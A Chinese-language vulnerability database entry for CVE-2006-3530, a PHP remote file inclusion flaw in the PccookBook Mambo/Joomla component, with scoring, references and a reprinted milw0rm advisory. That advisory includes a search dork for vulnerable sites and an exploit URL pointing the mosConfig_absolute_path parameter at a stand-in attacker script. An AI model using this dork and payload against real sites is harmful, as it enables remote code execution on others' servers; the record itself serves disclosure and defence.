CVE-2006-3530
CVSS6.8
发布时间 :2006-07-12 17:05:00
修订时间 :2011-03-07 21:38:51
NMCOE    

[原文]PHP remote file inclusion vulnerability in com_pccookbook/pccookbook.php in the PccookBook Component for Mambo and Joomla 0.3 and possibly up to 1.3.1, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via the mosConfig_absolute_path parameter.


[CNNVD]PC_CookBook 'PCCookBook.PHP'远程文件包含漏洞(CNNVD-200607-189)

        PccookBook Component for Mambo and Joomla 0.3以及可能的1.3.1之前版本中的com_pccookbook/pccookbook.php存在PHP远程文件包含漏洞。当register_globals启用时,远程攻击者可以借助mosConfig_absolute_path参数执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 6.8 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-94 [对生成代码的控制不恰当(代码注入)]

- CPE (受影响的平台与产品)

cpe:/a:joomla:pc_cookbook:1.3.1
cpe:/a:joomla:pc_cookbook:0.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3530
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3530
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-189
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/27641
(UNKNOWN)  XF  pccookbook-pccookbook-file-include(27641)
http://www.vupen.com/english/advisories/2006/2739
(UNKNOWN)  VUPEN  ADV-2006-2739
http://www.securityfocus.com/bid/18919
(UNKNOWN)  BID  18919
http://www.securityfocus.com/archive/1/archive/1/439618/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060710 [ECHO_ADV_37$2006] pc_cookbook Mambo/Joomla Component <= v0.3 Remote File Include Vulnerabilities
http://secunia.com/advisories/21015
(VENDOR_ADVISORY)  SECUNIA  21015
http://milw0rm.com/exploits/2024
(UNKNOWN)  MILW0RM  2024
http://advisories.echo.or.id/adv/adv37-matdhule-2006.txt
(UNKNOWN)  MISC  http://advisories.echo.or.id/adv/adv37-matdhule-2006.txt
http://securityreason.com/securityalert/1215
(UNKNOWN)  SREASON  1215

- 漏洞信息

PC_CookBook 'PCCookBook.PHP'远程文件包含漏洞
中危 代码注入
2006-07-12 00:00:00 2007-10-01 00:00:00
远程  
        PccookBook Component for Mambo and Joomla 0.3以及可能的1.3.1之前版本中的com_pccookbook/pccookbook.php存在PHP远程文件包含漏洞。当register_globals启用时,远程攻击者可以借助mosConfig_absolute_path参数执行任意PHP代码。

- 公告与补丁

        暂无数据

- 漏洞信息 (2024)

pc_cookbook Mambo Component <= 0.3 Include Vulnerability (EDBID:2024)
php webapps
2006-07-17 Verified
0 Matdhule
N/A [点击下载]
---------------------------------------------------------------------------------
pc_cookbook Joomla Component <= v0.3 Remote File Include Vulnerabilities
---------------------------------------------------------------------------------

Author : Matdhule
Contact : matdhule@gmail.com
Application : pc_cookbook Component
Version : koyans 0.3
URL : http://www.dianthos.net & http://www.fisheye.gr/koyansblog

---------------------------------------------------------------------------------
Dork : allinurl:com_pccookbook

Exploit :
http://[target]/[path]/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://evilscript

---------------------------------------------------------------------------------

Greetz : solpot, j4mbi_h4ck3r, h4ntu, the_day, & all crews #mardongan, #jambihackerlink @dalnet

# milw0rm.com [2006-07-17]
		

- 漏洞信息

27422
PcCookBook for Mambo (com_pccookbook) pccookbook.php mosConfig_absolute_path Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2006-07-10 Unknow
2006-07-17 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站